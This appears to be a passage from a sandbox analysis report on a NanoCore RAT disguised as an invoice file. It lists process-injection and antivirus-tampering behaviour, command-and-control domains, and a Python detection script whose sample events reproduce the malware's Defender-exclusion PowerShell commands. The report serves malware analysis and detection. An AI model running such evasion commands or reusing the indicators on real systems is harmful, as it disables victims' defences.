        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
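Detection logic for the evasion behaviours listed in this section, written as an added example (not part of the report or of any sandbox tooling). It runs over constructed event records built from the paths and values above; the record layout (type, parent, image, cmdline, ...) is an assumption of this example, not an EDR or sandbox schema. It flags the Add-MpPreference exclusions, the svchost.exe copy running from C:\Users\Public\Documents, the MZ header written into CasPol.exe, AdvancedRun launching a .bat, and network traffic from the masquerading binary, while leaving the genuine C:\Windows\System32\svchost.exe events alone.

```python
"""Detection rules for the behaviours listed above, run over constructed
event records modelled on the report's lines.  Added example; the record
layout (type/parent/image/cmdline ...) is an assumption of this example,
not a sandbox or EDR schema."""
import re
from pathlib import PureWindowsPath

# Directories from which the genuine copies of these binaries run.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "explorer.exe"}

# Add-MpPreference -ExclusionPath|-ExclusionProcess|-ExclusionExtension '<value>'
ADD_EXCLUSION = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+['\"]([^'\"]+)['\"]", re.I)
# NirSoft AdvancedRun asked to run a .bat under another account (/RunAs <n>).
ADVANCEDRUN_BAT = re.compile(r"/EXEFilename\s+'([^']+\.bat)'.*?/RunAs\s+\d+", re.I)


def masquerading(image: str) -> bool:
    """True for a system-binary name that runs from outside the system directories."""
    p = PureWindowsPath(image)
    return p.name.lower() in SYSTEM_NAMES and str(p.parent).lower() not in SYSTEM_DIRS


def analyse(events):
    """Return deduplicated (rule, detail) pairs in first-seen order."""
    findings = []

    def add(rule, detail):
        if (rule, detail) not in findings:
            findings.append((rule, detail))

    for ev in events:
        if ev["type"] == "process":
            image, cmd = ev["image"], ev["cmdline"]
            name = PureWindowsPath(image).name.lower()
            for candidate in (ev["parent"], image):
                if masquerading(candidate):
                    add("masquerading_system_binary", candidate)
            m = ADD_EXCLUSION.search(cmd)
            if name == "powershell.exe" and m:
                add("defender_exclusion_added", m.group(2))
            m = ADVANCEDRUN_BAT.search(cmd)
            if name == "advancedrun.exe" and m:
                add("advancedrun_runs_batch_as_other_account", m.group(1))
        elif ev["type"] == "memwrite" and ev["source"] != ev["target"]:
            add("foreign_memory_write", ev["target"])
            # An MZ header ("4D5A") landing in another process is the hollowing pattern.
            if ev["bytes"].upper().startswith("4D5A"):
                add("pe_written_into_foreign_process", f"{ev['target']} @ {ev['base']:#x}")
        elif ev["type"] == "network" and masquerading(ev["image"]):
            add("masquerading_binary_network", f"{ev['image']} -> {ev['dst']}")
    return findings


# Constructed events, using the paths and values that appear in this report.
SAMPLE = r"C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe"
DROPPED = r"C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe"
REAL_SVCHOST = r"C:\Windows\System32\svchost.exe"
POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CASPOL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
TEMP_DIR = r"C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4"
ADVRUN, BAT = TEMP_DIR + r"\AdvancedRun.exe", TEMP_DIR + r"\test.bat"

SAMPLE_EVENTS = [
    {"type": "process", "parent": SAMPLE, "image": POWERSHELL,
     "cmdline": f"'{POWERSHELL}' Add-MpPreference -ExclusionPath '{DROPPED}' -Force"},
    {"type": "process", "parent": DROPPED, "image": POWERSHELL,
     "cmdline": f"'{POWERSHELL}' Add-MpPreference -ExclusionPath '{SAMPLE}' -Force"},
    {"type": "process", "parent": SAMPLE, "image": ADVRUN,
     "cmdline": f"'{ADVRUN}' /EXEFilename '{BAT}' /WindowState ''0'' /PriorityClass ''32'' "
                "/CommandLine '' /StartDirectory '' /RunAs 8 /Run"},
    # Benign: the real svchost.exe spawning WerFault, as in the report; must not fire.
    {"type": "process", "parent": REAL_SVCHOST, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060"},
    {"type": "memwrite", "source": SAMPLE, "target": CASPOL, "base": 0x400000, "bytes": "4D5A"},
    {"type": "memwrite", "source": SAMPLE, "target": CASPOL, "base": 0xB30008, "bytes": "0000"},
    {"type": "network", "image": DROPPED, "dst": "104.21.71.230:80"},
    # Benign: the real svchost.exe talking to a TEST-NET address (constructed); must not fire.
    {"type": "network", "image": REAL_SVCHOST, "dst": "192.0.2.10:80"},
]

if __name__ == "__main__":
    for rule, detail in analyse(SAMPLE_EVENTS):
        print(f"{rule:40} {detail}")
```

Running the block lists seven findings. The WerFault launch and the System32 svchost.exe connection produce none because the path, not the process name, drives the masquerading rule; the write at 0xB30008 is reported only as a foreign memory write, since no MZ header lands there.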

        Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT
        Source: Yara match | File source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE
        Source: C:\Windows\explorer.exe | Directory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exe | Directory queried: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ

        Remote Access Functionality:

        Detected Nanocore Rat
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
        Source: CasPol.exe, 00000019.00000003.457248749.0000000006134000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RAT
        Source: Yara match | File source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Windows Management Instrumentation 1 | DLL Side-Loading 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 21 | OS Credential Dumping | File and Directory Discovery 11 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Native API 1 | Application Shimming 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | System Information Discovery 23 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | Command and Scripting Interpreter 1 | Windows Service 1 | Application Shimming 1 | Obfuscated Files or Information 2 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | Service Execution 2 | Registry Run Keys / Startup Folder 1 | Access Token Manipulation 1 | Timestomp 1 | NTDS | Security Software Discovery 341 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | Carrier Billing Fraud |
        Cloud Accounts | Cron | Network Logon Script | Windows Service 1 | DLL Side-Loading 1 | LSA Secrets | Virtualization/Sandbox Evasion 25 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 2 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
        Replication Through Removable Media | Launchd | Rc.common | Process Injection 311 | Masquerading 111 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 2 | Jamming or Denial of Service | Abuse Accessibility Features |
        External Remote Services | Scheduled Task | Startup Items | Registry Run Keys / Startup Folder 1 | Virtualization/Sandbox Evasion 25 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 311 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
        Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Hidden Files and Directories 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | |

        Behavior Graph


        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        Behavior Graph ID: 355838
        Sample: CN-Invoice-XXXXX9808-190111...
        Start date: 22/02/2021
        Architecture: WINDOWS
        Score: 100

        Start (signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Sigma detected: NanoCore; 12 other signatures)
          • CN-Invoice-XXXXX9808-19011143287990.exe (23 / 9)
            Network: coroloboxorozor.com 104.21.71.230, ports 49715, 49723, 49726, CLOUDFLARENETUS, United States
            Dropped: C:\Users\Public\Documents\...\svchost.exe (PE32); C:\Users\...\svchost.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\...\AdvancedRun.exe (PE32)
            Signatures: Writes to foreign memory regions; Adds a directory exclusion to Windows Defender; Hides threads from debuggers; 3 other signatures
            • CasPol.exe
              Network: nanopc.linkpc.net 185.192.70.170, port 50005, UKSERVERS-ASUKDedicatedServersHostingandCo-Location, Netherlands; 185.157.161.86, ports 49739, 50005, OBE-EUROPEObenetworkEuropeSE, Sweden
              Dropped: C:\Users\user\AppData\Roaming\...\run.dat (data)
              Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
            • AdvancedRun.exe (1)
              • AdvancedRun.exe
                Network: 192.168.2.1
            • cmd.exe
              • conhost.exe
              • timeout.exe
            • 3 other processes
              • conhost.exe
              • conhost.exe
          • explorer.exe
            • svchost.exe
              Network: coroloboxorozor.com
              Dropped: C:\Users\user\AppData\...\AdvancedRun.exe (PE32)
              Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Adds a directory exclusion to Windows Defender; Tries to delay execution (extensive OutputDebugStringW loop)
              • powershell.exe
                • conhost.exe
              • AdvancedRun.exe
          • explorer.exe
            • svchost.exe
              Network: coroloboxorozor.com
              Dropped: C:\Users\user\AppData\...\AdvancedRun.exe (PE32)
              Signatures: System process connects to network (likely due to code injection or exploit); Hides threads from debuggers; Injects a PE file into a foreign processes
          • 11 other processes
            Network: 127.0.0.1
            Signatures: Changes security center settings (notifications, updates, antivirus, firewall)
            • WerFault.exe

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label | Link
        CN-Invoice-XXXXX9808-19011143287990.exe | 26% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoBot |
        CN-Invoice-XXXXX9808-19011143287990.exe | 100% | Joe Sandbox ML | |

        Dropped Files

        Source | Detection | Scanner | Label | Link
        C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | 100% | Joe Sandbox ML | |
        C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | 26% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoBot |
        C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe | 3% | Metadefender | | Browse
        C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exe | 3% | Metadefender | | Browse
        C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exe | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe | 3% | Metadefender | | Browse
        C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe | 0% | ReversingLabs | |

        Unpacked PE Files

        No Antivirus matches

        Domains

        Source | Detection | Scanner | Label | Link
        coroloboxorozor.com | 0% | Virustotal | | Browse

        URLs

        Source | Detection | Scanner | Label | Link
        http://coroloboxorozor.com/base/95912DAC735F7FBEA8150232E35CAF73.html | 0% | Virustotal | | Browse
        http://coroloboxorozor.com/base/95912DAC735F7FBEA8150232E35CAF73.html | 0% | Avira URL Cloud | safe |
        http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
        http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
        http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
        http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
        http://coroloboxorozor.com | 0% | Virustotal | | Browse
        http://coroloboxorozor.com | 0% | Avira URL Cloud | safe |
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe |
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe |
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe |
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe |
        https://sectigo.com/CPS0C | 0% | URL Reputation | safe |
        https://sectigo.com/CPS0C | 0% | URL Reputation | safe |
        https://sectigo.com/CPS0C | 0% | URL Reputation | safe |
        https://sectigo.com/CPS0C | 0% | URL Reputation | safe |
        https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
        https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
        https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
        https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
        http://coroloboxorozor.com/base/751448401274A413C5FF91CCBC4EFF60.html | 0% | Avira URL Cloud | safe |
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe |
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe |
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe |
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
        https://dynamic.t | 0% | URL Reputation | safe |
        https://dynamic.t | 0% | URL Reputation | safe |
        https://dynamic.t | 0% | URL Reputation | safe |
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
        http://coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html | 0% | Avira URL Cloud | safe |

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        nanopc.linkpc.net | 185.192.70.170 | true | false | | high
        coroloboxorozor.com | 104.21.71.230 | true | true | | unknown

          Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://coroloboxorozor.com/base/95912DAC735F7FBEA8150232E35CAF73.html | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
        http://coroloboxorozor.com/base/751448401274A413C5FF91CCBC4EFF60.html | true | Avira URL Cloud: safe | unknown
        http://coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        http://ocsp.sectigo.com0 | CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
        https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | false | | high
        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp | false | | high
        https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmp | false | | high
        https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        http://coroloboxorozor.com | CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
        https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmp | false | | high
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | false | | high
        https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000012.00000003.310574824.000001F77325D000.00000004.00000001.sdmp | false | | high
        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000012.00000003.310709236.000001F773240000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        https://sectigo.com/CPS0C | CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
        https://sectigo.com/CPS0D | CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
        https://appexmapsappupdate.blob.core.windows.net | svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | false | | high
        http://www.nirsoft.net/ | AdvancedRun.exe, AdvancedRun.exe, 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000027.00000000.419368466.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.22.dr | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        http://www.bingmapsportal.com | svchost.exe, 00000012.00000002.312067468.000001F773213000.00000004.00000001.sdmp | false | | high
        https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp | false | | high
        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmp | false | | high
        https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp | false | | high
        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmp | false | | high
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.312067468.000001F773213000.00000004.00000001.sdmp | false | | high
        https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmp | false | | high
        https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | false | | high
        https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000012.00000003.288221774.000001F773232000.00000004.00000001.sdmp | false | | high
        https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
        https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmp | false | | high
        https://dynamic.t | svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
